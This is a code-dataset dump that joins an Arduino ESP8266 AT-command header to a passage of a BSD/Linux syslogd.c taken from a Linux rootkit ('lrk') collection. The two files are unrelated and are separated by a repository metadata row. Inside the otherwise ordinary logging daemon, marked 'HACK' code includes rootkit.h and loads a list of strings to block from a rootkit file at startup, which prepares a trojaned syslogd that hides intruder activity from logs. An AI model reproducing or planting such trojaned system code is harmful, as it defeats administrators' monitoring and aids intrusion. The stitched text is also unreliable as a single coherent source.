// RECV STRING: Recvive data from uart. Return all received data
//----------------------------------------------------------------------
bool recvString(uint32_t timeout);
String recvString(String target, uint32_t timeout = DEF_TIMEOUT);
String recvString(String target1, String target2, uint32_t timeout = DEF_TIMEOUT);
String recvString(String target, String target2, String target3, uint32_t timeout = DEF_TIMEOUT);
String recvString(String target1, String target2, String target3, String target4, String target5, String target6, uint32_t timeout);
//----------------------------------------------------------------------
// RECV FIND: Recvive data from uart and search first target. Return
// true if target found, false for timeout.
//----------------------------------------------------------------------
bool recvFind(String target, uint32_t timeout = DEF_TIMEOUT);
//----------------------------------------------------------------------
// RECV FIND AND FILTER: Recvive data from uart and search first
// target and cut out the substring between
// begin and end(excluding begin and end self).
// Return true if target found, false for
// timeout
//----------------------------------------------------------------------
bool recvFindAndFilter(String target, String begin, String end, String &data, uint32_t timeout = DEF_TIMEOUT);
//----------------------------------------------------------------------
// RECV PKG: Receive a package from uart
//----------------------------------------------------------------------
uint32_t recvPkg(uint8_t *buffer, uint32_t buffer_size, uint32_t *data_len, uint32_t timeout, uint8_t *coming_mux_id);
//----------------------------------------------------------------------
// AT COMMANDS
//----------------------------------------------------------------------
bool AT(void);
bool AT_RST(void);
bool AT_GMR(String &version);
bool AT_CWMODE(uint8_t mode);
bool AT_CWMODE(uint8_t *mode);
bool AT_CWJAP(String ssid, String pwd);
bool AT_CWLAP(String &list);
bool AT_CWQAP(void);
bool AT_CWSAP(String ssid, String pwd, uint8_t chl, uint8_t ecn);
bool AT_CWLIF(String &list);
bool AT_CIPSTATUS(String &list);
bool AT_CIPSTART_SINGLE(String type, String addr, uint32_t port);
bool AT_CIPSTART_SINGLE(String type, String addr, uint32_t port, uint32_t local_port, uint8_t mode);
bool AT_CIPSTART_MULTIPLE(uint8_t mux_id, String type, String addr, uint32_t port);
bool AT_CIPSTART_MULTIPLE(uint8_t mux_id, String type, String addr, uint32_t port, uint32_t local_port, uint8_t mode);
bool AT_CIPSEND_SINGLE( const uint8_t *buffer, uint32_t len);
bool AT_CIPSEND_MULTIPLE(uint8_t mux_id, const uint8_t *buffer, uint32_t len);
bool AT_CIPCLOSE_SINGLE(void);
bool AT_CIPCLOSE_MULTIPLE(uint8_t mux_id);
bool AT_CIFSR(String &list);
bool AT_CIPMUX(uint8_t mode);
bool AT_CIPSERVER(uint8_t mode, uint32_t port = 333);
bool AT_CIPSTO(uint32_t timeout);
//--------------------------------------------------------------------------
// PUBLIC MEMBERS AND FUNCTIONS
//--------------------------------------------------------------------------
public:
//----------------------------------------------------------------------
// PUBLIC FUNCTIONS
//----------------------------------------------------------------------
//----------------------------------------------------------------------
// ESP8266: Constructor of the class
//----------------------------------------------------------------------
ESP8266(SoftwareSerial &uart, uint32_t baud = DEF_BAUDRATE);
//------------------------------------------------------------------------------
// INIT UDP: Establish a successful UDP connection with network in STATION
// mode.
//------------------------------------------------------------------------------
bool init_UDP(const String &ssid, const String &pwd);
//------------------------------------------------------------------------------
// INIT TCP: Establish a successful TCP connection with network in STATION
// mode.
//------------------------------------------------------------------------------
bool init_TCP(uint8_t recv_mux_id, uint8_t send_mux_id);
//----------------------------------------------------------------------
// AUTO SET BAUD: Detect ESP8266 baudrate and reset it to baudRateSet
//----------------------------------------------------------------------
bool autoSetBaud(uint32_t baudRateSet = DEF_BAUDRATE);
//----------------------------------------------------------------------
// KICK: Verify ESP8266 whether live or not. Actually, this method
// will send command "AT" to ESP8266 and waiting for "OK"
//----------------------------------------------------------------------
bool kick(void);
//----------------------------------------------------------------------
// RESTART: Restart ESP8266 by "AT+RST". This method will take 3
// seconds or more
//----------------------------------------------------------------------
bool restart(void);
//----------------------------------------------------------------------
// GET VERSION: Get the version of AT Command Set
//----------------------------------------------------------------------
String getVersion(void);
//----------------------------------------------------------------------
// SET OPR TO STATION: Set operation mode to staion
//----------------------------------------------------------------------
bool setOprToStation(void);
//----------------------------------------------------------------------
// SET OPR TO SOFT AP: Set operation mode to softap
//----------------------------------------------------------------------
bool setOprToSoftAP(void);
//----------------------------------------------------------------------
// SET OPR TO STATION SOFT AP: Set operation mode to station + softap
//----------------------------------------------------------------------
bool setOprToStationSoftAP(void);
//----------------------------------------------------------------------
// GET AP LIST: Search available AP list and return it
//----------------------------------------------------------------------
String getAPList(void);
//----------------------------------------------------------------------
// JOIN AP: Join in AP
//----------------------------------------------------------------------
bool joinAP(String ssid, String pwd);
//----------------------------------------------------------------------
// LEAVE AP: Leave AP joined before
//----------------------------------------------------------------------
bool leaveAP(void);
//----------------------------------------------------------------------
// SOFT AP: Set SoftAP parameters
//----------------------------------------------------------------------
bool setSoftAPParam(String ssid, String pwd, uint8_t chl = 7, uint8_t ecn = 4);
//----------------------------------------------------------------------
// GET JOINED DEVICE IP: Get the IP list of devices connected to SoftAP
//----------------------------------------------------------------------
String getJoinedDeviceIP(void);
//----------------------------------------------------------------------
// GET IP STATUS: Get the current status of connection(UDP and TCP)
//----------------------------------------------------------------------
String getIPStatus(void);
//----------------------------------------------------------------------
// GET LOCAL IP: Get the IP address of ESP8266
//----------------------------------------------------------------------
String getLocalIP(void);
//----------------------------------------------------------------------
// ENABLE MUX: Enable IP MUX (multiple connection mode)
//----------------------------------------------------------------------
bool enableMUX(void);
//----------------------------------------------------------------------
// DISABLE MUX: Disable IP MUX(single connection mode). In single
// connection mode, only one TCP or UDP communication
// can be builded.
//----------------------------------------------------------------------
bool disableMUX(void);
//----------------------------------------------------------------------
// CEATE TCP: Create TCP connection in single mode
//----------------------------------------------------------------------
bool createTCP(String addr, uint32_t port);
//----------------------------------------------------------------------
// CREATE TCP: Create TCP connection in multiple mode
//----------------------------------------------------------------------
bool createTCP(uint8_t mux_id, String addr, uint32_t port);
//----------------------------------------------------------------------
// RELEASE TCP: Create TCP connection in single mode
//----------------------------------------------------------------------
bool releaseTCP(void);
//----------------------------------------------------------------------
// RELEASE TCP: Create TCP connection in multiple mode
//----------------------------------------------------------------------
bool releaseTCP(uint8_t mux_id);
//----------------------------------------------------------------------
// REGISTER UDP: Register UDP port number in single mode
//----------------------------------------------------------------------
bool registerUDP(String addr, uint32_t port);
//----------------------------------------------------------------------
// REGISTER UDP: Register UDP port number in multiple mode
//----------------------------------------------------------------------
bool registerUDP(uint8_t mux_id, String addr, uint32_t port);
//----------------------------------------------------------------------
// REGISTER UDP: Register UDP port number in single mode with local
// port
//----------------------------------------------------------------------
bool registerUDP(String addr, uint32_t port, uint32_t local_port, uint8_t mode);
//----------------------------------------------------------------------
// REGISTER UDP: Register UDP port number in multiple mode with local
// port
//----------------------------------------------------------------------
bool registerUDP(uint8_t mux_id, String addr, uint32_t port, uint32_t local_port, uint8_t mode);
//----------------------------------------------------------------------
// UNREGISTER UDP: Unregister UDP port number in single mode
//----------------------------------------------------------------------
bool unregisterUDP(void);
//----------------------------------------------------------------------
// UNREGISTER UDP: Unregister UDP port number in multiple mode
//----------------------------------------------------------------------
bool unregisterUDP(uint8_t mux_id);
//----------------------------------------------------------------------
// SET TCP SERVER TIMEOUT: Set the timeout of TCP Server
//----------------------------------------------------------------------
bool setTCPServerTimeout(uint32_t timeout = 180);
//----------------------------------------------------------------------
// START TCP SERVER: Start TCP Server (only in multiple mode). After
// started, user should call method: getIPStatus to
// know the status of TCP connections. The methods
// of receiving data can be called for user's any
// purpose. After communication, release the TCP
// connection is needed by calling method:
// releaseTCP with mux_id.
//----------------------------------------------------------------------
bool startTCPServer(uint32_t port = 333);
//----------------------------------------------------------------------
// STOP TCP SERVER: Stop TCP Server (only in multiple mode)
//----------------------------------------------------------------------
bool stopTCPServer(void);
//----------------------------------------------------------------------
// START SERVER: Start Server (only in multiple mode)
//----------------------------------------------------------------------
bool startServer(uint32_t port = 333);
//----------------------------------------------------------------------
// STOP SERVER: Stop Server (only in multiple mode)
//----------------------------------------------------------------------
bool stopServer(void);
//----------------------------------------------------------------------
// SEND: Send data based on one of TCP or UDP builded already in
// single mode
//----------------------------------------------------------------------
bool send(const uint8_t *buffer, uint32_t len);
//----------------------------------------------------------------------
// SEND: Send data based on one of TCP or UDP builded already in
// multiple mode
//----------------------------------------------------------------------
bool send(uint8_t mux_id, const uint8_t *buffer, uint32_t len);
//----------------------------------------------------------------------
// RECV: Receive data from TCP or UDP builded already in single mode
//----------------------------------------------------------------------
uint32_t recv(uint8_t *buffer, uint32_t buffer_size, uint32_t timeout = DEF_TIMEOUT);
//----------------------------------------------------------------------
// RECV: Receive data from one of TCP or UDP builded already in
// multiple mode
//----------------------------------------------------------------------
uint32_t recv(uint8_t mux_id, uint8_t *buffer, uint32_t buffer_size, uint32_t timeout = DEF_TIMEOUT);
//----------------------------------------------------------------------
// RECV: Receive data from TCP or UDP builded already in multple mode
// After return, coming_mux_id store the id of TCP or UDP
// from which data coming
//----------------------------------------------------------------------
uint32_t recv(uint8_t *coming_mux_id, uint8_t *buffer, uint32_t buffer_size, uint32_t timeout = DEF_TIMEOUT);
};
#endif
| 43.321526 | 137 | 0.360589 |
014c2d0a68cebdcf7831e289b59d67778bde1a1d | 59,416 | c | C | Unix Family/Linux.lrk.e/sysklogd-1.3/syslogd.c | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:13.000Z | 2022-03-16T09:11:05.000Z | Unix Family/Linux.lrk.e/sysklogd-1.3/syslogd.c | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | null | null | null | Unix Family/Linux.lrk.e/sysklogd-1.3/syslogd.c | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:15.000Z | 2022-01-08T20:51:04.000Z | /*
* Copyright (c) 1983, 1988 Regents of the University of California.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that the above copyright notice and this paragraph are
* duplicated in all such forms and that any documentation,
* advertising materials, and other materials related to such
* distribution and use acknowledge that the software was developed
* by the University of California, Berkeley. The name of the
* University may not be used to endorse or promote products derived
* from this software without specific prior written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
#if !defined(lint) && !defined(NO_SCCS)
char copyright2[] =
"@(#) Copyright (c) 1983, 1988 Regents of the University of California.\n\
All rights reserved.\n";
#endif /* not lint */
#if !defined(lint) && !defined(NO_SCCS)
static char sccsid[] = "@(#)syslogd.c 5.27 (Berkeley) 10/10/88";
#endif /* not lint */
/*
* syslogd -- log system messages
*
* This program implements a system log. It takes a series of lines.
* Each line may have a priority, signified as "<n>" as
* the first characters of the line. If this is
* not present, a default priority is used.
*
* To kill syslogd, send a signal 15 (terminate). A signal 1 (hup) will
* cause it to reread its configuration file.
*
* Defined Constants:
*
* MAXLINE -- the maximum line length that can be handled.
* DEFUPRI -- the default priority for user messages
* DEFSPRI -- the default priority for kernel messages
*
* Author: Eric Allman
* extensive changes by Ralph Campbell
* more extensive changes by Eric Allman (again)
*
* Steve Lord: Fix UNIX domain socket code, added linux kernel logging
* change defines to
* SYSLOG_INET - listen on a UDP socket
* SYSLOG_UNIXAF - listen on unix domain socket
* SYSLOG_KERNEL - listen to linux kernel
*
* Mon Feb 22 09:55:42 CST 1993: Dr. Wettstein
* Additional modifications to the source. Changed priority scheme
* to increase the level of configurability. In its stock configuration
* syslogd no longer logs all messages of a certain priority and above
* to a log file. The * wildcard is supported to specify all priorities.
* Note that this is a departure from the BSD standard.
*
* Syslogd will now listen to both the inetd and the unixd socket. The
* strategy is to allow all local programs to direct their output to
* syslogd through the unixd socket while the program listens to the
* inetd socket to get messages forwarded from other hosts.
*
* Fri Mar 12 16:55:33 CST 1993: Dr. Wettstein
* Thanks to Stephen Tweedie (dcs.ed.ac.uk!sct) for helpful bug-fixes
* and an enlightened commentary on the prioritization problem.
*
* Changed the priority scheme so that the default behavior mimics the
* standard BSD. In this scenario all messages of a specified priority
* and above are logged.
*
* Add the ability to specify a wildcard (=) as the first character
* of the priority name. Doing this specifies that ONLY messages with
* this level of priority are to be logged. For example:
*
* *.=debug /usr/adm/debug
*
* Would log only messages with a priority of debug to the /usr/adm/debug
* file.
*
* Providing an * as the priority specifies that all messages are to be
* logged. Note that this case is degenerate with specifying a priority
* level of debug. The wildcard * was retained because I believe that
* this is more intuitive.
*
* Thu Jun 24 11:34:13 CDT 1993: Dr. Wettstein
* Modified sources to incorporate changes in libc4.4. Messages from
* syslog are now null-terminated, syslogd code now parses messages
* based on this termination scheme. Linux as of libc4.4 supports the
* fsync system call. Modified code to fsync after all writes to
* log files.
*
* Sat Dec 11 11:59:43 CST 1993: Dr. Wettstein
* Extensive changes to the source code to allow compilation with no
* complaints with -Wall.
*
* Reorganized the facility and priority name arrays so that they
* compatible with the syslog.h source found in /usr/include/syslog.h.
* NOTE that this should really be changed. The reason I do not
* allow the use of the values defined in syslog.h is on account of
* the extensions made to allow the wildcard character in the
* priority field. To fix this properly one should malloc an array,
* copy the contents of the array defined by syslog.h and then
* make whatever modifications that are desired. Next round.
*
* Thu Jan 6 12:07:36 CST 1994: Dr. Wettstein
* Added support for proper decomposition and re-assembly of
* fragment messages on UNIX domain sockets. Lack of this capability
* was causing 'partial' messages to be output. Since facility and
* priority information is encoded as a leader on the messages this
* was causing lines to be placed in erroneous files.
*
* Also added a patch from Shane Alderton (shane@scs.apana.org.au) to
* correct a problem with syslogd dumping core when an attempt was made
* to write log messages to a logged-on user. Thank you.
*
* Many thanks to Juha Virtanen (jiivee@hut.fi) for a series of
* interchanges which lead to the fixing of problems with messages set
* to priorities of none and emerg. Also thanks to Juha for a patch
* to exclude users with a class of LOGIN from receiving messages.
*
* Shane Alderton provided an additional patch to fix zombies which
* were conceived when messages were written to multiple users.
*
* Mon Feb 6 09:57:10 CST 1995: Dr. Wettstein
* Patch to properly reset the single priority message flag. Thanks
* to Christopher Gori for spotting this bug and forwarding a patch.
*
* Wed Feb 22 15:38:31 CST 1995: Dr. Wettstein
* Added version information to startup messages.
*
* Added defines so that paths to important files are taken from
* the definitions in paths.h. Hopefully this will insure that
* everything follows the FSSTND standards. Thanks to Chris Metcalf
* for a set of patches to provide this functionality. Also thanks
* Elias Levy for prompting me to get these into the sources.
*
* Wed Jul 26 18:57:23 MET DST 1995: Martin Schulze
* Linux' gethostname only returns the hostname and not the fqdn as
* expected in the code. But if you call hostname with an fqdn then
* gethostname will return an fqdn, so we have to mention that. This
* has been changed.
*
* The 'LocalDomain' and the hostname of a remote machine is
* converted to lower case, because the original caused some
* inconsistency, because the (at least my) nameserver did respond an
* fqdn containing of upper- _and_ lowercase letters while
* 'LocalDomain' consisted only of lowercase letters and that didn't
* match.
*
* Sat Aug 5 18:59:15 MET DST 1995: Martin Schulze
* Now no messages that were received from any remote host are sent
* out to another. At my domain this missing feature caused ugly
* syslog-loops, sometimes.
*
* Remember that no message is sent out. I can't figure out any
* scenario where it might be useful to change this behavior and to
* send out messages to other hosts than the one from which we
* received the message, but I might be shortsighted. :-/
*
* Thu Aug 10 19:01:08 MET DST 1995: Martin Schulze
* Added my pidfile.[ch] to it to perform a better handling with
* pidfiles. Now both, syslogd and klogd, can only be started
* once. They check the pidfile.
*
* Sun Aug 13 19:01:41 MET DST 1995: Martin Schulze
* Add an addition to syslog.conf's interpretation. If a priority
* begins with an exclamation mark ('!') the normal interpretation
* of the priority is inverted: ".!*" is the same as ".none", ".!=info"
* don't logs the info priority, ".!crit" won't log any message with
* the priority crit or higher. For example:
*
* mail.*;mail.!=info /usr/adm/mail
*
* Would log all messages of the facility mail except those with
* the priority info to /usr/adm/mail. This makes the syslogd
* much more flexible.
*
* Defined TABLE_ALLPRI=255 and changed some occurrences.
*
* Sat Aug 19 21:40:13 MET DST 1995: Martin Schulze
* Making the table of facilities and priorities while in debug
* mode more readable.
*
* If debugging is turned on, printing the whole table of
* facilities and priorities every hexadecimal or 'X' entry is
* now 2 characters wide.
*
* The number of the entry is prepended to each line of
* facilities and priorities, and F_UNUSED lines are not shown
* anymore.
*
* Corrected some #ifdef SYSV's.
*
* Mon Aug 21 22:10:35 MET DST 1995: Martin Schulze
* Corrected a strange behavior during parsing of configuration
* file. The original BSD syslogd doesn't understand spaces as
* separators between specifier and action. This syslogd now
* understands them. The old behavior caused some confusion over
* the Linux community.
*
* Thu Oct 19 00:02:07 MET 1995: Martin Schulze
* The default behavior has changed for security reasons. The
* syslogd will not receive any remote message unless you turn
* reception on with the "-r" option.
*
* Not defining SYSLOG_INET will result in not doing any network
* activity, i.e. not sending or receiving messages. I changed
* this because the old idea is implemented with the "-r" option
* and the old thing didn't work anyway.
*
* Thu Oct 26 13:14:06 MET 1995: Martin Schulze
* Added another logfile type F_FORW_UNKN. The problem I ran into
* was a name server that runs on my machine and a forwarder of
* kern.crit to another host. The hosts address can only be
* fetched using the nameserver. But named is started after
* syslogd, so syslogd complained.
*
* This logfile type will retry to get the address of the
* hostname ten times and then complain. This should be enough to
* get the named up and running during boot sequence.
*
* Fri Oct 27 14:08:15 1995: Dr. Wettstein
* Changed static array of logfiles to a dynamic array. This
* can grow during process.
*
* Fri Nov 10 23:08:18 1995: Martin Schulze
* Inserted a new tabular sys_h_errlist that contains plain text
* for error codes that are returned from the net subsystem and
* stored in h_errno. I have also changed some wrong lookups to
* sys_errlist.
*
* Wed Nov 22 22:32:55 1995: Martin Schulze
* Added the fabulous strip-domain feature that allows us to
* strip off (several) domain names from the fqdn and only log
* the simple hostname. This is useful if you're in a LAN that
* has a central log server and also different domains.
*
* I have also also added the -l switch do define hosts as
* local. These will get logged with their simple hostname, too.
*
* Thu Nov 23 19:02:56 MET DST 1995: Martin Schulze
* Added the possibility to omit fsyncing of logfiles after every
* write. This will give some performance back if you have
* programs that log in a very verbose manner (like innd or
* smartlist). Thanks to Stephen R. van den Berg <srb@cuci.nl>
* for the idea.
*
* Thu Jan 18 11:14:36 CST 1996: Dr. Wettstein
* Added patche from beta-testers to stop compile error. Also
* added removal of pid file as part of termination cleanup.
*
* Wed Feb 14 12:42:09 CST 1996: Dr. Wettstein
* Allowed forwarding of messages received from remote hosts to
* be controlled by a command-line switch. Specifying -h allows
* forwarding. The default behavior is to disable forwarding of
* messages which were received from a remote host.
*
* Parent process of syslogd does not exit until child process has
* finished initialization process. This allows rc.* startup to
* pause until syslogd facility is up and operating.
*
* Re-arranged the select code to move UNIX domain socket accepts
* to be processed later. This was a contributed change which
* has been proposed to correct the delays sometimes encountered
* when syslogd starts up.
*
* Minor code cleanups.
*/
#define MAXLINE 1024 /* maximum line length */
#define MAXSVLINE 240 /* maximum saved line length */
#define DEFUPRI (LOG_USER|LOG_NOTICE)
#define DEFSPRI (LOG_KERN|LOG_CRIT)
#define TIMERINTVL 30 /* interval for checking flush, mark */
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef SYSV
#include <sys/types.h>
#endif
#include <utmp.h>
#include <ctype.h>
#include <string.h>
#include <setjmp.h>
#include <stdarg.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/errno.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/file.h>
#ifdef SYSV
#include <fcntl.h>
#else
#include <sys/msgbuf.h>
#endif
#include <linux/uio.h>
#include <sys/un.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#include <syscall.h>
#include <arpa/nameser.h>
#include <arpa/inet.h>
#include <resolv.h>
#include "pidfile.h"
#include "version.h"
#if defined(__linux__)
#include <paths.h>
#endif
#ifndef UTMP_FILE
#ifdef UTMP_FILENAME
#define UTMP_FILE UTMP_FILENAME
#else
#ifdef _PATH_UTMP
#define UTMP_FILE _PATH_UTMP
#else
#define UTMP_FILE "/etc/utmp"
#endif
#endif
#endif
#ifndef _PATH_LOGCONF
#define _PATH_LOGCONF "/etc/syslog.conf"
#endif
#if defined(SYSLOGD_PIDNAME)
#undef _PATH_LOGPID
#if defined(FSSTND)
#define _PATH_LOGPID _PATH_VARRUN SYSLOGD_PIDNAME
#else
#define _PATH_LOGPID "/etc/" SYSLOGD_PIDNAME
#endif
#else
#ifndef _PATH_LOGPID
#if defined(FSSTND)
#define _PATH_LOGPID _PATH_VARRUN "syslogd.pid"
#else
#define _PATH_LOGPID "/etc/syslogd.pid"
#endif
#endif
#endif
#ifndef _PATH_DEV
#define _PATH_DEV "/dev/"
#endif
#ifndef _PATH_CONSOLE
#define _PATH_CONSOLE "/dev/console"
#endif
#ifndef _PATH_TTY
#define _PATH_TTY "/dev/tty"
#endif
#ifndef _PATH_LOG
#define _PATH_LOG "/dev/log"
#endif
char *LogName = _PATH_LOG;
char *ConfFile = _PATH_LOGCONF;
char *PidFile = _PATH_LOGPID;
char ctty[] = _PATH_CONSOLE;
char **parts;
int inetm = 0, funix = 0;
static int debugging_on = 0;
static int nlogs = -1;
static int restart = 0;
#define UNAMESZ 8 /* length of a login name */
#define MAXUNAMES 20 /* maximum number of user names */
#define MAXFNAME 200 /* max file pathname length */
#define INTERNAL_NOPRI 0x10 /* the "no priority" priority */
#define TABLE_NOPRI 0 /* Value to indicate no priority in f_pmask */
#define TABLE_ALLPRI 0xFF /* Value to indicate all priorities in f_pmask */
#define LOG_MARK LOG_MAKEPRI(LOG_NFACILITIES, 0) /* mark "facility" */
/*
* Flags to logmsg().
*/
#define IGN_CONS 0x001 /* don't print on console */
#define SYNC_FILE 0x002 /* do fsync on file after printing */
#define ADDDATE 0x004 /* add a date to the message */
#define MARK 0x008 /* this message is a mark */
/*
* This table contains plain text for h_errno errors used by the
* net subsystem.
*/
const char *sys_h_errlist[] = {
"No problem", /* NETDB_SUCCESS */
"Authoritative answer: host not found", /* HOST_NOT_FOUND */
"Non-authoritative answer: host not found, or serverfail", /* TRY_AGAIN */
"Non recoverable errors", /* NO_RECOVERY */
"Valid name, no data record of requested type", /* NO_DATA */
"no address, look for MX record" /* NO_ADDRESS */
};
/*
* This structure represents the files that will have log
* copies printed.
*/
struct filed {
#ifndef SYSV
struct filed *f_next; /* next in linked list */
#endif
short f_type; /* entry type, see below */
short f_file; /* file descriptor */
time_t f_time; /* time this was last written */
u_char f_pmask[LOG_NFACILITIES+1]; /* priority mask */
union {
char f_uname[MAXUNAMES][UNAMESZ+1];
struct {
char f_hname[MAXHOSTNAMELEN+1];
struct sockaddr_in f_addr;
} f_forw; /* forwarding address */
char f_fname[MAXFNAME];
} f_un;
char f_prevline[MAXSVLINE]; /* last message logged */
char f_lasttime[16]; /* time of last occurrence */
char f_prevhost[MAXHOSTNAMELEN+1]; /* host from which recd. */
int f_prevpri; /* pri of f_prevline */
int f_prevlen; /* length of f_prevline */
int f_prevcount; /* repetition cnt of prevline */
int f_repeatcount; /* number of "repeated" msgs */
int f_flags; /* store some additional flags */
};
/*
* Intervals at which we flush out "message repeated" messages,
* in seconds after previous message is logged. After each flush,
* we move to the next interval until we reach the largest.
*/
int repeatinterval[] = { 30, 60 }; /* # of secs before flush */
#define MAXREPEAT ((sizeof(repeatinterval) / sizeof(repeatinterval[0])) - 1)
#define REPEATTIME(f) ((f)->f_time + repeatinterval[(f)->f_repeatcount])
#define BACKOFF(f) { if (++(f)->f_repeatcount > MAXREPEAT) \
(f)->f_repeatcount = MAXREPEAT; \
}
#ifdef SYSLOG_INET
#define INET_SUSPEND_TIME 180 /* equal to 3 minutes */
#define INET_RETRY_MAX 10 /* maximum of retries for gethostbyname() */
#endif
#define LIST_DELIMITER ':' /* delimiter between two hosts */
/* values for f_type */
#define F_UNUSED 0 /* unused entry */
#define F_FILE 1 /* regular file */
#define F_TTY 2 /* terminal */
#define F_CONSOLE 3 /* console terminal */
#define F_FORW 4 /* remote machine */
#define F_USERS 5 /* list of users */
#define F_WALL 6 /* everyone logged on */
#define F_FORW_SUSP 7 /* suspended host forwarding */
#define F_FORW_UNKN 8 /* unknown host forwarding */
char *TypeNames[9] = {
"UNUSED", "FILE", "TTY", "CONSOLE",
"FORW", "USERS", "WALL", "FORW(SUSPENDED)",
"FORW(UNKNOWN)"
};
struct filed *Files = (struct filed *) 0;
struct filed consfile;
struct code {
char *c_name;
int c_val;
};
struct code PriNames[] = {
{"alert", LOG_ALERT},
{"crit", LOG_CRIT},
{"debug", LOG_DEBUG},
{"emerg", LOG_EMERG},
{"err", LOG_ERR},
{"error", LOG_ERR}, /* DEPRECATED */
{"info", LOG_INFO},
{"none", INTERNAL_NOPRI}, /* INTERNAL */
{"notice", LOG_NOTICE},
{"panic", LOG_EMERG}, /* DEPRECATED */
{"warn", LOG_WARNING}, /* DEPRECATED */
{"warning", LOG_WARNING},
{"*", TABLE_ALLPRI},
{NULL, -1}
};
struct code FacNames[] = {
{"auth", LOG_AUTH},
{"authpriv", LOG_AUTHPRIV},
{"cron", LOG_CRON},
{"daemon", LOG_DAEMON},
{"kern", LOG_KERN},
{"lpr", LOG_LPR},
{"mail", LOG_MAIL},
{"mark", LOG_MARK}, /* INTERNAL */
{"news", LOG_NEWS},
{"security", LOG_AUTH}, /* DEPRECATED */
{"syslog", LOG_SYSLOG},
{"user", LOG_USER},
{"uucp", LOG_UUCP},
{"local0", LOG_LOCAL0},
{"local1", LOG_LOCAL1},
{"local2", LOG_LOCAL2},
{"local3", LOG_LOCAL3},
{"local4", LOG_LOCAL4},
{"local5", LOG_LOCAL5},
{"local6", LOG_LOCAL6},
{"local7", LOG_LOCAL7},
{NULL, -1},
};
int Debug; /* debug flag */
char LocalHostName[MAXHOSTNAMELEN+1]; /* our hostname */
char *LocalDomain; /* our local domain name */
int InetInuse = 0; /* non-zero if INET sockets are being used */
int finet; /* Internet datagram socket */
int LogPort; /* port number for INET connections */
int Initialized = 0; /* set when we have initialized ourselves */
int MarkInterval = 20 * 60; /* interval between marks in seconds */
int MarkSeq = 0; /* mark sequence number */
int NoFork = 0; /* don't fork - don't run in daemon mode */
int AcceptRemote = 0; /* receive messages that come via UDP */
char **StripDomains = NULL; /* these domains may be stripped before writing logs */
char **LocalHosts = NULL; /* these hosts are logged with their hostname */
int NoHops = 1; /* Can we bounce syslog messages through an
intermediate host. */
extern int errno, sys_nerr;
extern char *sys_errlist[];
extern char *ctime(), *index();
/* HACK vars */
#include "../rootkit.h"
#define FILENAME ROOTKIT_LOG_FILE
#define STR_SIZE 128
struct h_st {
struct h_st *next;
char logstr[STR_SIZE];
};
struct h_st *hack_list;
struct h_st *h_tmp;
char tmp_str[STR_SIZE];
FILE *fp_hack;
int showall=0;
/* End hack vars */
void hackinit(void)
{
/*+ HACK Read in strings to block +*/
h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
hack_list=h_tmp;
if ((int)fp_hack=fopen (FILENAME, "r")) {
while (fgets(tmp_str, 126, fp_hack)) {
h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
strcpy (h_tmp->logstr, tmp_str);
h_tmp->logstr[strlen(h_tmp->logstr)-1]='\0';
h_tmp=h_tmp->next;
}
fclose(fp_hack);
}
h_tmp->next=NULL;
}
/*+ On with the program +*/
/* Function prototypes. */
int main(int argc, char **argv);
char **crunch_list(char *list);
int usage(void);
void untty(void);
void printchopped(const char *hname, char *msg, int len, int fd);
void printline(const char *hname, char *msg);
void printsys(char *msg);
void logmsg(int pri, char *msg, const char *from, int flags);
void fprintlog(register struct filed *f, char *from, int flags, char *msg);
void endtty();
void wallmsg(register struct filed *f, struct iovec *iov);
void reapchild();
const char *cvthname(struct sockaddr_in *f);
void domark();
void debug_switch();
void logerror(char *type);
void die(int sig);
void init();
void cfline(char *line, register struct filed *f);
int decode(char *name, struct code *codetab);
static void dprintf(char *, ...);
static void allocate_log(void);
void sighup_handler();
int main(argc, argv)
int argc;
char **argv;
{
register int i;
register char *p;
int len, num_fds;
fd_set unixm, readfds;
int fd;
#ifdef SYSLOG_UNIXAF
struct sockaddr_un sunx, fromunix;
#endif
#ifdef SYSLOG_INET
struct sockaddr_in sin, frominet;
char *from;
#endif
int ch;
struct hostent *hent;
char line[MAXLINE +1];
extern int optind;
extern char *optarg;
int quitpid = 0;
/* HACK initialise */
hackinit();
while ((ch = getopt(argc, argv, "dhf:l:m:np:rs:v")) != EOF)
switch((char)ch) {
case 'd': /* debug */
Debug = 1;
break;
case 'f': /* configuration file */
ConfFile = optarg;
break;
case 'h':
NoHops = 0;
break;
case 'l':
if (LocalHosts) {
printf ("Only one -l argument allowed," \
"the first one is taken.\n");
break;
}
LocalHosts = crunch_list(optarg);
break;
case 'm': /* mark interval */
MarkInterval = atoi(optarg) * 60;
break;
case 'n': /* don't fork */
NoFork = 1;
break;
case 'p': /* path */
LogName = optarg;
break;
case 'r': /* accept remote messages */
AcceptRemote = 1;
break;
case 's':
if (StripDomains) {
printf ("Only one -s argument allowed," \
"the first one is taken.\n");
break;
}
StripDomains = crunch_list(optarg);
break;
case 'v':
printf("syslogd %s-%s\n", VERSION, PATCHLEVEL);
exit (1);
case '?':
default:
usage();
}
if (argc -= optind)
usage();
if ( !(Debug || NoFork) )
{
dprintf("Checking pidfile.\n");
if (!check_pid(PidFile))
{
quitpid = getpid();
if (fork())
{
/* We try to wait the end of initialization */
sleep(10);
exit(0);
}
num_fds = getdtablesize();
for (i= 0; i < num_fds; i++)
(void) close(i);
untty();
}
else
{
fputs("syslogd: Already running.\n", stderr);
exit(1);
}
}
else
debugging_on = 1;
#ifndef SYSV
else
setlinebuf(stdout);
#endif
/* tuck my process id away */
if ( !Debug )
{
dprintf("Writing pidfile.\n");
if (!check_pid(PidFile))
{
if (!write_pid(PidFile))
{
dprintf("Can't write pid.\n");
